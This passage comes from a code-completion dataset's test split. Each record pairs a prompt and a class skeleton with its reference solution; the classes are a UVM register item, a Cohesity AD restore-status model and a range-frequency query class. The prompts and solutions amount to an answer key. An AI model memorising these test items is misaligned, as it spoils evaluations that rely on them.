null')\narr_rhs_ = []\nif not sv.cast(arr_rhs_, rhs, UVMRegItem):\n uvm_error('WRONG_TYPE', 'Provided rhs is not of type uvm_reg_item')\n return\nrhs_ = arr_rhs_[0]\nsuper().copy(rhs)\nself.element_kind = rhs_.element_kind\nself.element = rhs_.element\nself.kind = rhs_.kind\nself.value = rhs_.value\nself.offset = rhs_.offset\nself.status = rhs_.status\nself.local_map = rhs_.local_map\nself.map = rhs_.map\nself.path = rhs_.path\nself.extension = rhs_.extension\nself.bd_kind = rhs_.bd_kind\nself.parent = rhs_.parent\nself.prior = rhs_.prior\nself.fname = rhs_.fname\nself.lineno = rhs_.lineno"], "bodies_text": "<|body_start_0|>\n UVMSequenceItem.__init__(self, name)\n self.value: List[int] = [0]\n self.path = UVM_FRONTDOOR\n self.status = 0\n self.fname = ''\n self.lineno = 0\n self.bd_kind = ''\n self.prior = -1\n self.extension = None\n self.parent = None\n self.offset = 0\n self.kind = UVM_READ\n self.element = None\n self.element_kind = -1\n self.map = None\n self.local_map = None\n<|end_body_0|>\n\n<|body_start_1|>\n value_s = ''\n ele_name = 'null'\n if self.element is not None:\n ele_name = self.element.get_full_name()\n kind_str = UVM_ACCESS_NAMES[self.kind]\n element_kind_str = UVM_ELEMENT_KIND_NAMES[self.element_kind]\n s = 'kind=' + kind_str + ' ele_kind=' + element_kind_str + ' ele_name=' + ele_name\n if len(self.value) > 1 and uvm_report_enabled(UVM_HIGH, UVM_INFO, 'RegModel'):\n value_s = \"'{\"\n for i in range(len(self.value)):\n value_s = value_s + sv.sformatf('%0h,', self.value[i])\n value_s = value_s[:-1] + '}'\n else:\n value_s = sv.sformatf('%0h', self.value[0])\n s = s + ' value=' + value_s\n if self.element_kind == UVM_MEM:\n s = s + sv.sformatf(' offset=%0h', self.offset)\n map_name = 'null'\n if self.map is not None:\n map_name = self.map.get_full_name()\n s = s + ' map=' + map_name + ' path=' + str(self.path)\n s = s + ' status=' + str(self.status)\n return s\n<|end_body_1|>\n\n<|body_start_2|>\n if rhs is None:\n uvm_fatal('REG/NULL', 'do_copy: rhs argument is null')\n arr_rhs_ = []\n if not sv.cast(arr_rhs_, rhs, UVMRegItem):\n uvm_error('WRONG_TYPE', 'Provided rhs is not of type uvm_reg_item')\n return\n rhs_ = arr_rhs_[0]\n super().copy(rhs)\n self.element_kind = rhs_.element_kind\n self.element = rhs_.element\n self.kind = rhs_.kind\n self.value = rhs_.value\n self.offset = rhs_.offset\n self.status = rhs_.status\n self.local_map = rhs_.local_map\n self.map = rhs_.map\n self.path = rhs_.path\n self.extension = rhs_.extension\n self.bd_kind = rhs_.bd_kind\n self.parent = rhs_.parent\n self.prior = rhs_.prior\n self.fname = rhs_.fname\n self.lineno = rhs_.lineno\n<|end_body_2|>\n", "class_docstring": "CLASS: UVMRegItem Defines an abstract register transaction item. No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.", "class_name": "UVMRegItem", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UVMRegItem:\n \"\"\"CLASS: UVMRegItem Defines an abstract register transaction item. No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.\"\"\"\n\n def __init__(self, name='') -> None:\n \"\"\"Create a new instance of this type, giving it the optional `name`. Args: name (str): Name of the instance\"\"\"\n <|body_0|>\n\n def convert2string(self) -> str:\n \"\"\"Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.\"\"\"\n <|body_1|>\n\n def do_copy(self, rhs) -> None:\n \"\"\"Function: do_copy Copy the ~rhs~ object into this object. The ~rhs~ object must derive from `UVMRegItem`.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n UVMSequenceItem.__init__(self, name)\n self.value: List[int] = [0]\n self.path = UVM_FRONTDOOR\n self.status = 0\n self.fname = ''\n self.lineno = 0\n self.bd_kind = ''\n self.prior = -1\n self.extension = None\n self.parent = None\n self.offset = 0\n self.kind = UVM_READ\n self.element = None\n self.element_kind = -1\n self.map = None\n self.local_map = None\n<|end_body_0|>\n\n<|body_start_1|>\n value_s = ''\n ele_name = 'null'\n if self.element is not None:\n ele_name = self.element.get_full_name()\n kind_str = UVM_ACCESS_NAMES[self.kind]\n element_kind_str = UVM_ELEMENT_KIND_NAMES[self.element_kind]\n s = 'kind=' + kind_str + ' ele_kind=' + element_kind_str + ' ele_name=' + ele_name\n if len(self.value) > 1 and uvm_report_enabled(UVM_HIGH, UVM_INFO, 'RegModel'):\n value_s = \"'{\"\n for i in range(len(self.value)):\n value_s = value_s + sv.sformatf('%0h,', self.value[i])\n value_s = value_s[:-1] + '}'\n else:\n value_s = sv.sformatf('%0h', self.value[0])\n s = s + ' value=' + value_s\n if self.element_kind == UVM_MEM:\n s = s + sv.sformatf(' offset=%0h', self.offset)\n map_name = 'null'\n if self.map is not None:\n map_name = self.map.get_full_name()\n s = s + ' map=' + map_name + ' path=' + str(self.path)\n s = s + ' status=' + str(self.status)\n return s\n<|end_body_1|>\n\n<|body_start_2|>\n if rhs is None:\n uvm_fatal('REG/NULL', 'do_copy: rhs argument is null')\n arr_rhs_ = []\n if not sv.cast(arr_rhs_, rhs, UVMRegItem):\n uvm_error('WRONG_TYPE', 'Provided rhs is not of type uvm_reg_item')\n return\n rhs_ = arr_rhs_[0]\n super().copy(rhs)\n self.element_kind = rhs_.element_kind\n self.element = rhs_.element\n self.kind = rhs_.kind\n self.value = rhs_.value\n self.offset = rhs_.offset\n self.status = rhs_.status\n self.local_map = rhs_.local_map\n self.map = rhs_.map\n self.path = rhs_.path\n self.extension = rhs_.extension\n self.bd_kind = rhs_.bd_kind\n self.parent = rhs_.parent\n self.prior = rhs_.prior\n self.fname = rhs_.fname\n self.lineno = rhs_.lineno\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000112", "length_bytes": 9874, "license_type": "permissive", "methods": [{"docstring": "Create a new instance of this type, giving it the optional `name`. Args: name (str): Name of the instance", "name": "__init__", "signature": "def __init__(self, name='') -> None"}, {"docstring": "Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.", "name": "convert2string", "signature": "def convert2string(self) -> str"}, {"docstring": "Function: do_copy Copy the ~rhs~ object into this object. The ~rhs~ object must derive from `UVMRegItem`.", "name": "do_copy", "signature": "def do_copy(self, rhs) -> None"}], "n_methods": 3, "prompt": "Implement the Python class `UVMRegItem` described below.\n\nClass description:\nCLASS: UVMRegItem Defines an abstract register transaction item. No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.\n\nMethod signatures and docstrings:\n- def __init__(self, name='') -> None: Create a new instance of this type, giving it the optional `name`. Args: name (str): Name of the instance\n- def convert2string(self) -> str: Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.\n- def do_copy(self, rhs) -> None: Function: do_copy Copy the ~rhs~ object into this object. The ~rhs~ object must derive from `UVMRegItem`.", "prompted_full_text": "Implement the Python class `UVMRegItem` described below.\n\nClass description:\nCLASS: UVMRegItem Defines an abstract register transaction item. No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.\n\nMethod signatures and docstrings:\n- def __init__(self, name='') -> None: Create a new instance of this type, giving it the optional `name`. Args: name (str): Name of the instance\n- def convert2string(self) -> str: Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.\n- def do_copy(self, rhs) -> None: Function: do_copy Copy the ~rhs~ object into this object. The ~rhs~ object must derive from `UVMRegItem`.\n\n<|skeleton|>\nclass UVMRegItem:\n \"\"\"CLASS: UVMRegItem Defines an abstract register transaction item. No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.\"\"\"\n\n def __init__(self, name='') -> None:\n \"\"\"Create a new instance of this type, giving it the optional `name`. Args: name (str): Name of the instance\"\"\"\n <|body_0|>\n\n def convert2string(self) -> str:\n \"\"\"Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.\"\"\"\n <|body_1|>\n\n def do_copy(self, rhs) -> None:\n \"\"\"Function: do_copy Copy the ~rhs~ object into this object. The ~rhs~ object must derive from `UVMRegItem`.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n UVMSequenceItem.__init__(self, name)\n self.value: List[int] = [0]\n self.path = UVM_FRONTDOOR\n self.status = 0\n self.fname = ''\n self.lineno = 0\n self.bd_kind = ''\n self.prior = -1\n self.extension = None\n self.parent = None\n self.offset = 0\n self.kind = UVM_READ\n self.element = None\n self.element_kind = -1\n self.map = None\n self.local_map = None\n<|end_body_0|>\n\n<|body_start_1|>\n value_s = ''\n ele_name = 'null'\n if self.element is not None:\n ele_name = self.element.get_full_name()\n kind_str = UVM_ACCESS_NAMES[self.kind]\n element_kind_str = UVM_ELEMENT_KIND_NAMES[self.element_kind]\n s = 'kind=' + kind_str + ' ele_kind=' + element_kind_str + ' ele_name=' + ele_name\n if len(self.value) > 1 and uvm_report_enabled(UVM_HIGH, UVM_INFO, 'RegModel'):\n value_s = \"'{\"\n for i in range(len(self.value)):\n value_s = value_s + sv.sformatf('%0h,', self.value[i])\n value_s = value_s[:-1] + '}'\n else:\n value_s = sv.sformatf('%0h', self.value[0])\n s = s + ' value=' + value_s\n if self.element_kind == UVM_MEM:\n s = s + sv.sformatf(' offset=%0h', self.offset)\n map_name = 'null'\n if self.map is not None:\n map_name = self.map.get_full_name()\n s = s + ' map=' + map_name + ' path=' + str(self.path)\n s = s + ' status=' + str(self.status)\n return s\n<|end_body_1|>\n\n<|body_start_2|>\n if rhs is None:\n uvm_fatal('REG/NULL', 'do_copy: rhs argument is null')\n arr_rhs_ = []\n if not sv.cast(arr_rhs_, rhs, UVMRegItem):\n uvm_error('WRONG_TYPE', 'Provided rhs is not of type uvm_reg_item')\n return\n rhs_ = arr_rhs_[0]\n super().copy(rhs)\n self.element_kind = rhs_.element_kind\n self.element = rhs_.element\n self.kind = rhs_.kind\n self.value = rhs_.value\n self.offset = rhs_.offset\n self.status = rhs_.status\n self.local_map = rhs_.local_map\n self.map = rhs_.map\n self.path = rhs_.path\n self.extension = rhs_.extension\n self.bd_kind = rhs_.bd_kind\n self.parent = rhs_.parent\n self.prior = rhs_.prior\n self.fname = rhs_.fname\n self.lineno = rhs_.lineno\n<|end_body_2|>\n", "revision_id": "fc5f955701b2b56c1fddac195c70cb3ebb9139fe", "skeleton": "<|skeleton|>\nclass UVMRegItem:\n \"\"\"CLASS: UVMRegItem Defines an abstract register transaction item. No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.\"\"\"\n\n def __init__(self, name='') -> None:\n \"\"\"Create a new instance of this type, giving it the optional `name`. Args: name (str): Name of the instance\"\"\"\n <|body_0|>\n\n def convert2string(self) -> str:\n \"\"\"Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.\"\"\"\n <|body_1|>\n\n def do_copy(self, rhs) -> None:\n \"\"\"Function: do_copy Copy the ~rhs~ object into this object. The ~rhs~ object must derive from `UVMRegItem`.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UVMRegItem:\n \"\"\"CLASS: UVMRegItem Defines an abstract register transaction item. No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.\"\"\"\n\n def __init__(self, name='') -> None:\n \"\"\"Create a new instance of this type, giving it the optional `name`. Args: name (str): Name of the instance\"\"\"\n UVMSequenceItem.__init__(self, name)\n self.value: List[int] = [0]\n self.path = UVM_FRONTDOOR\n self.status = 0\n self.fname = ''\n self.lineno = 0\n self.bd_kind = ''\n self.prior = -1\n self.extension = None\n self.parent = None\n self.offset = 0\n self.kind = UVM_READ\n self.element = None\n self.element_kind = -1\n self.map = None\n self.local_map = None\n\n def convert2string(self) -> str:\n \"\"\"Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.\"\"\"\n value_s = ''\n ele_name = 'null'\n if self.element is not None:\n ele_name = self.element.get_full_name()\n kind_str = UVM_ACCESS_NAMES[self.kind]\n element_kind_str = UVM_ELEMENT_KIND_NAMES[self.element_kind]\n s = 'kind=' + kind_str + ' ele_kind=' + element_kind_str + ' ele_name=' + ele_name\n if len(self.value) > 1 and uvm_report_enabled(UVM_HIGH, UVM_INFO, 'RegModel'):\n value_s = \"'{\"\n for i in range(len(self.value)):\n value_s = value_s + sv.sformatf('%0h,', self.value[i])\n value_s = value_s[:-1] + '}'\n else:\n value_s = sv.sformatf('%0h', self.value[0])\n s = s + ' value=' + value_s\n if self.element_kind == UVM_MEM:\n s = s + sv.sformatf(' offset=%0h', self.offset)\n map_name = 'null'\n if self.map is not None:\n map_name = self.map.get_full_name()\n s = s + ' map=' + map_name + ' path=' + str(self.path)\n s = s + ' status=' + str(self.status)\n return s\n\n def do_copy(self, rhs) -> None:\n \"\"\"Function: do_copy Copy the ~rhs~ object into this object. The ~rhs~ object must derive from `UVMRegItem`.\"\"\"\n if rhs is None:\n uvm_fatal('REG/NULL', 'do_copy: rhs argument is null')\n arr_rhs_ = []\n if not sv.cast(arr_rhs_, rhs, UVMRegItem):\n uvm_error('WRONG_TYPE', 'Provided rhs is not of type uvm_reg_item')\n return\n rhs_ = arr_rhs_[0]\n super().copy(rhs)\n self.element_kind = rhs_.element_kind\n self.element = rhs_.element\n self.kind = rhs_.kind\n self.value = rhs_.value\n self.offset = rhs_.offset\n self.status = rhs_.status\n self.local_map = rhs_.local_map\n self.map = rhs_.map\n self.path = rhs_.path\n self.extension = rhs_.extension\n self.bd_kind = rhs_.bd_kind\n self.parent = rhs_.parent\n self.prior = rhs_.prior\n self.fname = rhs_.fname\n self.lineno = rhs_.lineno\n", "source": "the_stack_v2_python_sparse", "source_path": "src/uvm/reg/uvm_reg_item.py", "source_repo": "tpoikela/uvm-python", "split": "test", "star_events_count": 199} {"blob_id": "7328b07eaa3c2cc5d17279e58805e6692ec46465", "bodies": ["self.dest_guid = dest_guid\nself.object_flags = object_flags\nself.property_status_vec = property_status_vec\nself.source_guid = source_guid\nself.status = status\nself.timetaken_ms = timetaken_ms", "if dictionary is None:\n return None\ndest_guid = dictionary.get('destGuid')\nobject_flags = dictionary.get('objectFlags')\nproperty_status_vec = None\nif dictionary.get('propertyStatusVec') != None:\n property_status_vec = list()\n for structure in dictionary.get('propertyStatusVec'):\n property_status_vec.append(cohesity_management_sdk.models.ad_object_restore_status_ad_attribute_restore_status.ADObjectRestoreStatus_ADAttributeRestoreStatus.from_dictionary(structure))\nsource_guid = dictionary.get('sourceGuid')\nstatus = cohesity_management_sdk.models.error_proto.ErrorProto.from_dictionary(dictionary.get('status')) if dictionary.get('status') else None\ntimetaken_ms = dictionary.get('timetakenMs')\nreturn cls(dest_guid, object_flags, property_status_vec, source_guid, status, timetaken_ms)"], "bodies_text": "<|body_start_0|>\n self.dest_guid = dest_guid\n self.object_flags = object_flags\n self.property_status_vec = property_status_vec\n self.source_guid = source_guid\n self.status = status\n self.timetaken_ms = timetaken_ms\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n dest_guid = dictionary.get('destGuid')\n object_flags = dictionary.get('objectFlags')\n property_status_vec = None\n if dictionary.get('propertyStatusVec') != None:\n property_status_vec = list()\n for structure in dictionary.get('propertyStatusVec'):\n property_status_vec.append(cohesity_management_sdk.models.ad_object_restore_status_ad_attribute_restore_status.ADObjectRestoreStatus_ADAttributeRestoreStatus.from_dictionary(structure))\n source_guid = dictionary.get('sourceGuid')\n status = cohesity_management_sdk.models.error_proto.ErrorProto.from_dictionary(dictionary.get('status')) if dictionary.get('status') else None\n timetaken_ms = dictionary.get('timetakenMs')\n return cls(dest_guid, object_flags, property_status_vec, source_guid, status, timetaken_ms)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'ADObjectRestoreStatus' model. TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. sourc", "class_name": "ADObjectRestoreStatus", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ADObjectRestoreStatus:\n \"\"\"Implementation of the 'ADObjectRestoreStatus' model. TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. sourc\"\"\"\n\n def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None):\n \"\"\"Constructor for the ADObjectRestoreStatus class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.dest_guid = dest_guid\n self.object_flags = object_flags\n self.property_status_vec = property_status_vec\n self.source_guid = source_guid\n self.status = status\n self.timetaken_ms = timetaken_ms\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n dest_guid = dictionary.get('destGuid')\n object_flags = dictionary.get('objectFlags')\n property_status_vec = None\n if dictionary.get('propertyStatusVec') != None:\n property_status_vec = list()\n for structure in dictionary.get('propertyStatusVec'):\n property_status_vec.append(cohesity_management_sdk.models.ad_object_restore_status_ad_attribute_restore_status.ADObjectRestoreStatus_ADAttributeRestoreStatus.from_dictionary(structure))\n source_guid = dictionary.get('sourceGuid')\n status = cohesity_management_sdk.models.error_proto.ErrorProto.from_dictionary(dictionary.get('status')) if dictionary.get('status') else None\n timetaken_ms = dictionary.get('timetakenMs')\n return cls(dest_guid, object_flags, property_status_vec, source_guid, status, timetaken_ms)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000113", "length_bytes": 4444, "license_type": "permissive", "methods": [{"docstring": "Constructor for the ADObjectRestoreStatus class", "name": "__init__", "signature": "def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006340", "prompt": "Implement the Python class `ADObjectRestoreStatus` described below.\n\nClass description:\nImplementation of the 'ADObjectRestoreStatus' model. TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. sourc\n\nMethod signatures and docstrings:\n- def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None): Constructor for the ADObjectRestoreStatus class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `ADObjectRestoreStatus` described below.\n\nClass description:\nImplementation of the 'ADObjectRestoreStatus' model. TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. sourc\n\nMethod signatures and docstrings:\n- def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None): Constructor for the ADObjectRestoreStatus class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass ADObjectRestoreStatus:\n \"\"\"Implementation of the 'ADObjectRestoreStatus' model. TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. sourc\"\"\"\n\n def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None):\n \"\"\"Constructor for the ADObjectRestoreStatus class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.dest_guid = dest_guid\n self.object_flags = object_flags\n self.property_status_vec = property_status_vec\n self.source_guid = source_guid\n self.status = status\n self.timetaken_ms = timetaken_ms\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n dest_guid = dictionary.get('destGuid')\n object_flags = dictionary.get('objectFlags')\n property_status_vec = None\n if dictionary.get('propertyStatusVec') != None:\n property_status_vec = list()\n for structure in dictionary.get('propertyStatusVec'):\n property_status_vec.append(cohesity_management_sdk.models.ad_object_restore_status_ad_attribute_restore_status.ADObjectRestoreStatus_ADAttributeRestoreStatus.from_dictionary(structure))\n source_guid = dictionary.get('sourceGuid')\n status = cohesity_management_sdk.models.error_proto.ErrorProto.from_dictionary(dictionary.get('status')) if dictionary.get('status') else None\n timetaken_ms = dictionary.get('timetakenMs')\n return cls(dest_guid, object_flags, property_status_vec, source_guid, status, timetaken_ms)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass ADObjectRestoreStatus:\n \"\"\"Implementation of the 'ADObjectRestoreStatus' model. TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. sourc\"\"\"\n\n def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None):\n \"\"\"Constructor for the ADObjectRestoreStatus class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ADObjectRestoreStatus:\n \"\"\"Implementation of the 'ADObjectRestoreStatus' model. TODO: type description here. Attributes: dest_guid (string): Destination guid string of the AD object that is newly created on production AD corresponding to 'source_guid'. If the object was restored from production AD recycle Bin, this value can be empty or set to same value as 'source_guid'. If this value is non-empty and is different from source_guid, implying production AD object is a new object created in production AD as part of restore. object_flags (int): Object result flags of type ADObjectFlags. property_status_vec (list of ADObjectRestoreStatus_ADAttributeRestoreStatus): AD object attribute(property) restore status vector. sourc\"\"\"\n\n def __init__(self, dest_guid=None, object_flags=None, property_status_vec=None, source_guid=None, status=None, timetaken_ms=None):\n \"\"\"Constructor for the ADObjectRestoreStatus class\"\"\"\n self.dest_guid = dest_guid\n self.object_flags = object_flags\n self.property_status_vec = property_status_vec\n self.source_guid = source_guid\n self.status = status\n self.timetaken_ms = timetaken_ms\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n dest_guid = dictionary.get('destGuid')\n object_flags = dictionary.get('objectFlags')\n property_status_vec = None\n if dictionary.get('propertyStatusVec') != None:\n property_status_vec = list()\n for structure in dictionary.get('propertyStatusVec'):\n property_status_vec.append(cohesity_management_sdk.models.ad_object_restore_status_ad_attribute_restore_status.ADObjectRestoreStatus_ADAttributeRestoreStatus.from_dictionary(structure))\n source_guid = dictionary.get('sourceGuid')\n status = cohesity_management_sdk.models.error_proto.ErrorProto.from_dictionary(dictionary.get('status')) if dictionary.get('status') else None\n timetaken_ms = dictionary.get('timetakenMs')\n return cls(dest_guid, object_flags, property_status_vec, source_guid, status, timetaken_ms)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/ad_object_restore_status.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "3c88f93df22dfcd613ae198b0733b3e1a3c96890", "bodies": ["self.d = {}\nfor i, elem in enumerate(arr):\n if self.d.has_key(elem):\n self.d[elem].append(i)\n else:\n self.d[elem] = [i]", "if value not in self.d.keys():\n return 0\nres = 0\nfor ind in self.d[value]:\n if left <= ind <= right:\n res += 1\nreturn res"], "bodies_text": "<|body_start_0|>\n self.d = {}\n for i, elem in enumerate(arr):\n if self.d.has_key(elem):\n self.d[elem].append(i)\n else:\n self.d[elem] = [i]\n<|end_body_0|>\n\n<|body_start_1|>\n if value not in self.d.keys():\n return 0\n res = 0\n for ind in self.d[value]:\n if left <= ind <= right:\n res += 1\n return res\n<|end_body_1|>\n", "class_docstring": "", "class_name": "RangeFreqQuery", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RangeFreqQuery:\n\n def __init__(self, arr):\n \"\"\":type arr: List[int]\"\"\"\n <|body_0|>\n\n def query(self, left, right, value):\n \"\"\":type left: int :type right: int :type value: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.d = {}\n for i, elem in enumerate(arr):\n if self.d.has_key(elem):\n self.d[elem].append(i)\n else:\n self.d[elem] = [i]\n<|end_body_0|>\n\n<|body_start_1|>\n if value not in self.d.keys():\n return 0\n res = 0\n for ind in self.d[value]:\n if left <= ind <= right:\n res += 1\n return res\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000114", "length_bytes": 1037, "license_type": "no_license", "methods": [{"docstring": ":type arr: List[int]", "name": "__init__", "signature": "def __init__(self, arr)"}, {"docstring": ":type left: int :type right: int :type value: int :rtype: int", "name": "query", "signature": "def query(self, left, right, value)"}], "n_methods": 2, "prompt": "Implement the Python class `RangeFreqQuery` described below.\n\nClass description:\nImplement the RangeFreqQuery class.\n\nMethod signatures and docstrings:\n- def __init__(self, arr): :type arr: List[int]\n- def query(self, left, right, value): :type left: int :type right: int :type value: int :rtype: int", "prompted_full_text": "Implement the Python class `RangeFreqQuery` described below.\n\nClass description:\nImplement the RangeFreqQuery class.\n\nMethod signatures and docstrings:\n- def __init__(self, arr): :type arr: List[int]\n- def query(self, left, right, value): :type left: int :type right: int :type value: int :rtype: int\n\n<|skeleton|>\nclass RangeFreqQuery:\n\n def __init__(self, arr):\n \"\"\":type arr: List[int]\"\"\"\n <|body_0|>\n\n def query(self, left, right, value):\n \"\"\":type left: int :type right: int :type value: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.d = {}\n for i, elem in enumerate(arr):\n if self.d.has_key(elem):\n self.d[elem].append(i)\n else:\n self.d[elem] = [i]\n<|end_body_0|>\n\n<|body_start_1|>\n if value not in self.d.keys():\n return 0\n res = 0\n for ind in self.d[value]:\n if left <= ind <= right:\n res += 1\n return res\n<|end_body_1|>\n", "revision_id": "ee59b82125f100970c842d5e1245287c484d6649", "skeleton": "<|skeleton|>\nclass RangeFreqQuery:\n\n def __init__(self, arr):\n \"\"\":type arr: List[int]\"\"\"\n <|body_0|>\n\n def query(self, left, right, value):\n \"\"\":type left: int :type right: int :type value: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RangeFreqQuery:\n def __init__(self, arr):\n \"\"\":type arr: List[int]\"\"\"\n self.d = {}\n for i, elem in enumerate(arr):\n if self.d.has_key(elem):\n self.d[elem].append(i)\n 